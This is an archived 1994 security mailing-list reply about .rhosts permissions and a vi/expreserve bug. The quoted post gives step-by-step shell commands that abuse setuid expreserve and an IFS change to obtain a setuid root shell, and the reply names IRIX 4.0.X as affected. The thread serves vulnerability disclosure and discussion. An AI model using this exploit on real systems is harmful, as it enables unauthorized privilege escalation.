Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email firstname.lastname@example.org
Re: chmod 000 .rhosts - works?jsz (jszramon.bgu.ac.il)
Sat, 15 Oct 94 16:17:00 IST
- Messages sorted by: [ date ][ thread ][ subject ][ author ]
- Next message: Nick Andrew: "Re: Internet Worm (fwd)"
- Previous message: jsz: "Re: finger-bombing, abuse timeout"
- In reply to: Charles Howes: "Re: chmod 000 .rhosts - works?"
- Next in thread: Chris Ellwood: "Re: chmod 000 .rhosts - works?"
> > ObBug: vi runs expreserve when it crashes or you type ':pre' (on some > versions). Expreserve is setuid root. Expreserve runs /bin/mail > with 'system()'. So, do the following: > % cd /tmp > % cp /bin/sh fubar > % cat > bin > chmod 4755 fubar > ^D > % chmod u+x fubar > % setenv IFS=/ > % vi > :pre > :q > % fubar > # It has been known since 1986? You'll find IRIX 4.0.X vulnerable to it, but expreserve is sgid sys, so you'd get access to read kmem tables -- Regards ----